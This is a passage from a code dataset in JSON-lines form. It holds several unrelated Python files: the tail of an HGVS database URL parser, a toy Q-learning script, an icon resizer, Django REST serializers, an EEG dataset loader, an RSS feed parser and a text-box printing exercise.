n_tries_rem -= 1\n\n else:\n\n # N.B. Probably never reached\n raise HGVSError(\"Permanently lost connection to {url} ({n} retries)\".format(url=self.url, n=n_retries))\n\n\nclass ParseResult(urlparse.ParseResult):\n \"\"\"Subclass of url.ParseResult that adds database and schema methods,\n and provides stringification.\n\n \"\"\"\n\n def __new__(cls, pr):\n return super(ParseResult, cls).__new__(cls, *pr)\n\n @property\n def database(self):\n path_elems = self.path.split(\"/\")\n return path_elems[1] if len(path_elems) > 1 else None\n\n @property\n def schema(self):\n path_elems = self.path.split(\"/\")\n return path_elems[2] if len(path_elems) > 2 else None\n\n def __str__(self):\n return self.geturl()\n\n\ndef _parse_url(db_url):\n \"\"\"parse database connection urls into components\n\n UTA database connection URLs follow that of SQLAlchemy, except\n that a schema may be optionally specified after the database. The\n skeleton format is:\n\n driver://user:pass@host/database/schema\n\n >>> params = _parse_url(\"driver://user:pass@host:9876/database/schema\")\n\n >>> params.scheme\n u'driver'\n\n >>> params.hostname\n u'host'\n\n >>> params.username\n u'user'\n\n >>> params.password\n u'pass'\n\n >>> params.database\n u'database'\n\n >>> params.schema\n u'schema'\n\n \"\"\"\n\n return ParseResult(urlparse.urlparse(db_url))\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n\n# \n# Copyright 2018 HGVS Contributors (https://github.com/biocommons/hgvs)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n","sub_path":"vvhgvs/dataproviders/uta.py","file_name":"uta.py","file_ext":"py","file_size_in_byte":25413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104416593","text":"#!/usr/bin/env pytohn\n#-*- coding: utf-8 -*-\n'''\n\tpython ==> RL Sung Kim 강의, Dummy Q Learing을 구현해본 코드\n'''\n\nimport gym\nfrom gym.envs.registration import register\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys, tty, termios\nimport random as pr\n\n#\ndef rargmax(vector):\n\t# argmax that chooses randomly among eligible maximum idices\n\tm = np.amax(vector)\n\tindices = np.nonzero(vector == m)[0]\n\treturn pr.choice(indices)\n\nregister(\n\tid='FrozenLake-v3',\n\tentry_point = 'gym.envs.toy_text:FrozenLakeEnv',\n\tkwargs={'map_name' : '4x4', 'is_slippery' : False}\n)\n\nenv = gym.make('FrozenLake-v3')\n\n# Initialize table with zeros\nQ = np.zeros([env.observation_space.n, env.action_space.n])\n\n# set learning parameters\nnum_episodes = 2000\n\n# create lists to contain total rewards and steps per epdisode\nrList = []\nfor i in range(num_episodes):\n\t# reset environment and get first new observation\n\tstate = env.reset()\n\trAll = 0\n\tdone = False;\n\n\t# the q-table learning algorithm\n\twhile not done:\n\t\taction = rargmax(Q[state, :])\n\t\t# get new state and reward from environment\n\t\tnew_state, reward, done, _ = env.step(action)\n\n\t\t# update q-table with new knowledge usig learning rate\n\t\tQ[state,action] = reward + np.max(Q[new_state,:])\n\t\trAll += reward\n\t\tstate = new_state\n\trList.append(rAll)\n\n\nprint(\"Success rate: \" + str(sum(rList)/num_episodes))\nprint(\"Final Q-table values\")\nprint(\"LEFT DOWN RIGHT UP\")\nprint(Q)\nplt.plot(range(len(rList)), rList, 'r+', color=\"blue\")\nplt.show()\n","sub_path":"python_archive/machineLearning/sungKim_lecture/dummyQLearning.py","file_name":"dummyQLearning.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"548544786","text":"#!/usr/bin/env python3\n\n# The script uses the ImageMagic's `convert` tool to resize app icons.\n\n\"\"\"\nScript receives a single argument: path to .png file.\nUsage example:\n app_icon_resize_legacy.py image.png\n\"\"\"\n\nimport os\nfrom subprocess import call\nimport sys\n\n\nSIZES = [\n (20, 1),\n (20, 2),\n (20, 3),\n (24, 2),\n (27.5, 2),\n (29, 1),\n (29, 2),\n (29, 3),\n (40, 1),\n (40, 2),\n (40, 3),\n (44, 2),\n (50, 1),\n (50, 2),\n (57, 1),\n (57, 2),\n (60, 2),\n (60, 3),\n (72, 1),\n (72, 2),\n (76, 1),\n (76, 2),\n (83.5, 2),\n (86, 2),\n (98, 2),\n (108, 2),\n (1024, 1)\n]\n\n\ndef resize(original, size, scale):\n file_name = format_name(size, scale)\n print(file_name)\n side = str(int(size * scale))\n call([\"convert\", original, \"-alpha\", \"off\",\n \"-resize\", side + \"x\" + side, file_name])\n\n\ndef format_name(size, scale):\n return str(size) + \"@\" + str(scale) + \"x\" + \".png\"\n\n\ndef test_format_name():\n assert format_name(24, 2) == \"24@2x.png\"\n\n\ndef get_original_path():\n if len(sys.argv) != 2:\n sys.exit(__doc__)\n original = sys.argv[1]\n if os.path.exists(original):\n return original\n sys.exit(f'Path does not exist: \"{original}\".')\n\n\noriginal = get_original_path()\nfor (size, scale) in SIZES:\n resize(original, size, scale)\n","sub_path":"deprecated-scripts/app_icon_resize_legacy.py","file_name":"app_icon_resize_legacy.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71343767","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom accounts.models import UserProfile, User\nfrom groups.models import Group\nfrom groupchat.models import GroupMessage,GroupChat\nimport json\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n fields = ['id', 'last_login', 'email', 'is_active', 'is_staff'] # '__all__'\n read_only_fields = ['id', 'last_login', 'email', 'is_active', 'is_staff']\n\n\nclass UserAdminSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n fields = '__all__'\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = ['user', 'url', 'profile_image', 'fake_count'] # '__all__'\n read_only_fields = ['user', 'fake_count']\n\n def update(self, instance, validated_data):\n instance.profile_image = validated_data.get('profile_image', instance.profile_image)\n instance.save()\n return instance\n\n\nclass UserPublicProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = ['url', 'profile_image'] # '__all__'\n read_only_fields = ['url', 'profile_image']\n\n\nclass UserAdminProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = '__all__'\n\n def update(self, instance, validated_data):\n instance.profile_image = validated_data.get('profile_image', instance.profile_image)\n instance.save()\n return instance\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = ['id', 'owner', 'parents', 'children', 'name', 'uri', 'children_uri_field', 'description',\n 'group_image', 'group_banner']\n read_only_fields = ['id', 'owner', 'parents', 'children', 'name', 'uri', 'children_uri_field', 'description',\n 'group_image', 'group_banner']\n\n children_uri_field = serializers.SerializerMethodField('children_uri')\n\n def children_uri(self, group):\n _group = Group.objects.get(uri=group)\n children = []\n for child in _group.children.all():\n children.append(child.uri)\n return children\n\n\nclass GroupChatSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupChat\n fields = ['id', 'type', 'name', 'group', 'group_messages']\n\n group_messages = serializers.SerializerMethodField('group_message')\n\n def group_message(self, groupchat):\n _groupchat = GroupChat.objects.get(id=groupchat.id)\n messages = []\n for message in _groupchat.messages.all():\n messages.append(message.message)\n return messages\n\n\nclass GroupMessageSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupMessage\n fields = ['author', 'author_name', 'author_url', 'message', 'created', 'updated', 'group_chat']\n\n author_name = serializers.SerializerMethodField('author_name_field')\n author_url = serializers.SerializerMethodField('author_url_field')\n\n def author_name_field(self, groupmessage):\n return groupmessage.author.full_name\n\n def author_url_field(self, groupmessage):\n return groupmessage.author.profile.url\n\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369507027","text":"import os\nimport glob\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.io import loadmat\nfrom torch.utils.data import Dataset\nfrom torch.utils.data._utils.collate import default_collate\n\nfrom utils import load_pkl, save_pkl, resample_signal, cudize, random_latents\n\nDATASET_VERSION = 7\n\n'''\n!pip install imageio\n!pip install gdown\n#val=0, stride=1(1.5), num_channels=17, start=1\n!gdown --id 1Lp5e9vHPeFaVyccT48H0wbGSblrC81Gu\n!gdown --id 17QIjg0lkvedcmmpo1YP79OeTpt7TuYNI\n'''\n\n\n# our channels are CHNL = { 'F3', 'F4', 'O1', 'O2', 'CZ' }\n# for super res, get F3, O1, CZ and generate F4 and O2\n# bio_sampling_freq: 1 -> 4 -> 8 -> 16 -> 24 -> 32 -> 40 -> 60\nclass EEGDataset(Dataset):\n # for 60(sampling), starting from 1 hz(sampling) [32 samples at the beginning]\n progression_scale_up = [4, 2, 2, 3, 4, 5, 3]\n progression_scale_down = [1, 1, 1, 2, 3, 4, 2]\n\n # for 60(sampling), starting from 0.25 hz(sampling) [8 samples at the beginning] (also set start_depth)\n # progression_scale_up = [2, 2] + progression_scale_up\n # progression_scale_down = [1, 1] + progression_scale_down\n\n picked_channels = [3, 5, 9, 15, 16]\n\n def __init__(self, given_data, dir_path='./data/prepared_eegs_mat_th5/', data_sampling_freq=220,\n start_sampling_freq=1, end_sampling_freq=60, start_seq_len=32, num_channels=17, return_long=False):\n super().__init__()\n self.model_depth = len(self.progression_scale_up)\n self.alpha = 1.0\n self.dir_path = dir_path\n self.end_sampling_freq = end_sampling_freq\n seq_len = start_seq_len * end_sampling_freq / start_sampling_freq * 1.5\n assert seq_len == int(seq_len), 'seq_len must be an int'\n seq_len = int(seq_len)\n self.seq_len = seq_len\n self.initial_kernel_size = start_seq_len\n self.stride = seq_len\n self.max_dataset_depth = len(self.progression_scale_up)\n self.num_channels = num_channels if self.picked_channels is None else len(self.picked_channels)\n self.return_long = return_long\n if given_data is not None:\n self.seq_len = int(start_seq_len * end_sampling_freq / start_sampling_freq)\n self.data_pointers = given_data[0]\n self.datas = given_data[1]\n return\n all_files = glob.glob(os.path.join(dir_path, '*_1.txt'))\n is_matlab = len(all_files) == 0\n if is_matlab:\n all_files = glob.glob(os.path.join(dir_path, '*.mat'))\n files = [i for i in range(len(all_files))]\n sizes = []\n num_points = []\n self.datas = []\n for i in tqdm(files):\n is_ok = True\n if is_matlab:\n try:\n tmp = loadmat(all_files[i])['eeg_signal']\n tmp = resample_signal(tmp, data_sampling_freq, end_sampling_freq, False)\n size = int(np.ceil((tmp.shape[1] - seq_len + 1) / self.stride))\n except:\n size = 0\n if size <= 0:\n is_ok = False\n else:\n sizes.append(size)\n num_points.append((sizes[-1] - 1) * self.stride + seq_len)\n if self.picked_channels is None:\n self.datas.append(tmp[:num_channels, :num_points[-1]])\n else:\n self.datas.append(tmp[self.picked_channels, :num_points[-1]])\n else:\n for_range = range(num_channels) if self.picked_channels is None else self.picked_channels\n for kk, j in enumerate(for_range):\n with open('{}_{}.txt'.format(all_files[i][:-6], j + 1)) as f:\n tmp = list(map(float, f.read().split()))\n tmp = np.array(tmp, dtype=np.float32)\n tmp = resample_signal(tmp, data_sampling_freq, end_sampling_freq, False)\n if kk == 0:\n size = int(np.ceil((len(tmp) - seq_len + 1) / self.stride))\n if size <= 0:\n is_ok = False\n break\n sizes.append(size)\n num_points.append((sizes[-1] - 1) * self.stride + seq_len)\n self.datas.append(np.zeros((num_channels, num_points[-1]), dtype=np.float32))\n tmp = tmp[:num_points[-1]]\n self.datas[-1][j, :] = tmp\n if is_ok:\n self.datas[-1], is_ok = self.normalize(self.datas[-1])\n if not is_ok:\n del sizes[-1]\n del num_points[-1]\n del self.datas[-1]\n self.data_pointers = [(i, j) for i, s in enumerate(sizes) for j in range(s)]\n\n @classmethod\n def from_config(cls, validation_ratio, validation_seed, dir_path, data_sampling_freq,\n start_sampling_freq, end_sampling_freq, start_seq_len, num_channels, return_long):\n assert end_sampling_freq <= data_sampling_freq\n target_location = os.path.join(dir_path, '{}c_{}v_{}ss_{}es_{}l.npz'.format(num_channels, DATASET_VERSION,\n start_sampling_freq,\n end_sampling_freq, start_seq_len))\n if os.path.exists(target_location):\n print('loading dataset from file: {}'.format(target_location))\n given_data = np.load(target_location)\n given_data = [load_pkl(target_location + '.pkl'), [given_data['arr_{}'.format(i)]\n for i in range(len(given_data.keys()))]]\n else:\n print('creating dataset from scratch')\n dataset = cls(None, dir_path, data_sampling_freq, start_sampling_freq,\n end_sampling_freq, start_seq_len, num_channels, return_long)\n np.savez_compressed(target_location, *dataset.datas)\n save_pkl(target_location + '.pkl', dataset.data_pointers)\n given_data = [dataset.data_pointers, dataset.datas]\n return_datasets = []\n for i in range(2):\n return_datasets.append(cls(given_data, dir_path, data_sampling_freq, start_sampling_freq,\n end_sampling_freq, start_seq_len, num_channels, return_long))\n data_pointers = [x for x in return_datasets[0].data_pointers]\n np.random.seed(validation_seed)\n np.random.shuffle(data_pointers)\n return_datasets[0].data_pointers = data_pointers[:int((1 - validation_ratio) * len(data_pointers))]\n return_datasets[1].data_pointers = data_pointers[int((1 - validation_ratio) * len(data_pointers)):]\n return return_datasets[0], return_datasets[1]\n\n @staticmethod\n def normalize(arr):\n arr_max = arr.max()\n arr_min = arr.min()\n is_ok = arr_max != arr_min\n return ((arr - arr_min) / ((arr_max - arr_min) if is_ok else 1.0)) * 2.0 - 1.0, is_ok\n\n @property\n def shape(self):\n return len(self), self.num_channels, self.seq_len\n\n def __len__(self):\n return len(self.data_pointers)\n\n def load_file(self, item):\n i, k = self.data_pointers[item]\n if self.return_long:\n return self.datas[i][:, k * self.stride:(k + 1) * self.stride]\n else:\n rand_shift = np.random.randint(self.stride - self.seq_len)\n return self.datas[i][:, k * self.stride + rand_shift:k * self.stride + rand_shift + self.seq_len]\n\n def resample_data(self, data, index, forward=True, alpha_fade=False):\n up_scale = self.progression_scale_up[index - (1 if alpha_fade else 0)]\n down_scale = self.progression_scale_down[index - (1 if alpha_fade else 0)]\n if forward:\n return resample_signal(data, down_scale, up_scale, True)\n return resample_signal(data, up_scale, down_scale, True)\n\n def __getitem__(self, item):\n with torch.no_grad():\n datapoint = torch.from_numpy(self.load_file(item).astype(np.float32)).unsqueeze(0)\n target_depth = self.model_depth\n if self.max_dataset_depth != target_depth:\n datapoint = self.create_datapoint_from_depth(datapoint, target_depth)\n return {'x': self.alpha_fade(datapoint).squeeze(0)}\n\n def create_datapoint_from_depth(self, datapoint, target_depth):\n depth_diff = (self.max_dataset_depth - target_depth)\n for index in reversed(list(range(len(self.progression_scale_up)))[-depth_diff:]):\n datapoint = self.resample_data(datapoint, index, False)\n return datapoint\n\n def alpha_fade(self, datapoint):\n if self.alpha == 1:\n return datapoint\n t = self.resample_data(datapoint, self.model_depth, False, alpha_fade=True)\n t = self.resample_data(t, self.model_depth, True, alpha_fade=True)\n return datapoint + (t - datapoint) * (1 - self.alpha)\n\n\ndef get_collate_real(max_sampling_freq, max_len):\n def collate_real(batch):\n return cudize(default_collate(batch))\n\n return collate_real\n\n\ndef get_collate_fake(latent_size, z_distribution, collate_real):\n def collate_fake(batch):\n batch = collate_real(batch) # extract condition(features)\n batch['z'] = random_latents(batch['x'].size(0), latent_size, z_distribution)\n return batch\n\n return collate_fake\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"81317671","text":"import sys\nimport urllib\nimport logging\nfrom datetime import datetime\n\nfrom py.ext import feedparser\n\nfrom py.common.utils import *\n\n\ndef GetAndParse(feed, debug, feedDataSettings):\n a1 = datetime.now()\n feed = urllib.unquote_plus(feed) # because of encodeURIComponent\n if feedDataSettings is None:\n feedDataSettings = GetFeedDataSettings(feed)\n someDataWasAdded = False\n\n if (feedDataSettings is None):\n logging.debug('GetAndParse => feedDataSettings is None: %s', feed)\n\n etag = getattr(feedDataSettings, 'new_etag', None)\n modified = getattr(feedDataSettings, 'new_modified', None)\n\n a = datetime.now()\n d = feedparser.parse(feed, etag=etag, modified=modified)\n b = datetime.now()\n c = b - a\n logging.debug('parse (%s) entries for %s', len(d['entries']), feed)\n logging.debug('parsing took %s seconds', c.seconds)\n\n items = []\n itemSize = sys.getsizeof(feedDataSettings.private_data)\n\n entriesCount = 0\n\n for e in d['entries']:\n di = {}\n\n di['link'] = getattr(e, 'link', 'THIS_WILL_HUNT_ME')\n # use hashlib.hexdigest?\n di['id'] = str(hash(getattr(e, 'id', di['link'])))\n\n httpId = di['link']\n if httpId.startswith('https'):\n httpId = httpId.replace('https', 'http', 1)\n\n # compare by id and by http link (some feeds keep generating\n # radnom(?!?) http or https prefix thus the normalization)\n if feedDataSettings.latest_item_id == di['id']:\n if len(items) > 0:\n AddSomeData(d, feed, items, feedDataSettings, False)\n items = []\n someDataWasAdded = True\n\n break\n\n if feedDataSettings.latest_http_link == httpId:\n if len(items) > 0:\n AddSomeData(d, feed, items, feedDataSettings, False)\n items = []\n someDataWasAdded = True\n\n break\n\n di['title'] = getattr(e, 'title', '')\n di['author'] = getattr(e, 'author', '')\n\n try:\n di['published'] = e.published\n except:\n di['published'] = GetCurrentDateTime()\n\n try:\n if hasattr(e, 'content'):\n if len(e.content) > 0:\n headline_content = ''\n lEntries = len(e.content)\n for eCount in range(0, lEntries):\n headline_content = headline_content + \\\n e.content[eCount].value\n di['content'] = headline_content\n else:\n di['content'] = e.description\n except:\n di['content'] = ''\n\n if hasattr(d, 'feed'):\n if hasattr(d['feed'], 'title'):\n di['feedTitle'] = d['feed']['title']\n\n ##feedDataSettings.article_count = feedDataSettings.article_count + 1\n\n itemSize = itemSize + sys.getsizeof(di)\n if itemSize < 80000: # todo more preciese calcs here\n items.append(di)\n else:\n AddSomeData(d, feed, items, feedDataSettings, True)\n itemSize = 0\n items = []\n someDataWasAdded = True\n\n entriesCount = entriesCount + 1\n if entriesCount > 100:\n # well, just stop\n break\n\n if len(items) > 0:\n AddSomeData(d, feed, items, feedDataSettings, False)\n someDataWasAdded = True\n\n b1 = datetime.now()\n c1 = b1 - a1\n logging.debug('GetAndParse took %s seconds', c1.seconds)\n\n # if not someDataWasAdded:\n # self.calcNextUpdateInterval(False)\n","sub_path":"src/py/common/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"476735150","text":"line1 = \"hello tarena!\"\nline2 = \"my name is weimingze\"\nline3 = \"good-bye\"\nspace = ' '\nspace1 = len(line2) - len(line1)\nspace11 = space1 // 2 + 1\nspace12 = space1 - space11 + 2\nspace2 = 1\nspace3 = len(line2) - len(line3)\nspace31 = space3 // 2 + 1\nspace32 = space3 - space31 + 2\nheng1 = len(line2) + 2\nprint(\"+\" + \"-\" * heng1 + \"+\")\nprint(\"|\" + space * heng1 + \"|\")\nprint(\"|\" + space * space11 + line1 + space * space12 + \"|\")\nprint(\"|\" + space * space2 + line2 + space * space2 + \"|\")\nprint(\"|\" + space * space31 + line3 + space * space32 + \"|\")\nprint(\"|\" + space * heng1 + \"|\")\nprint(\"+\" + \"-\" * heng1 + \"+\")\n","sub_path":"text3.py","file_name":"text3.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}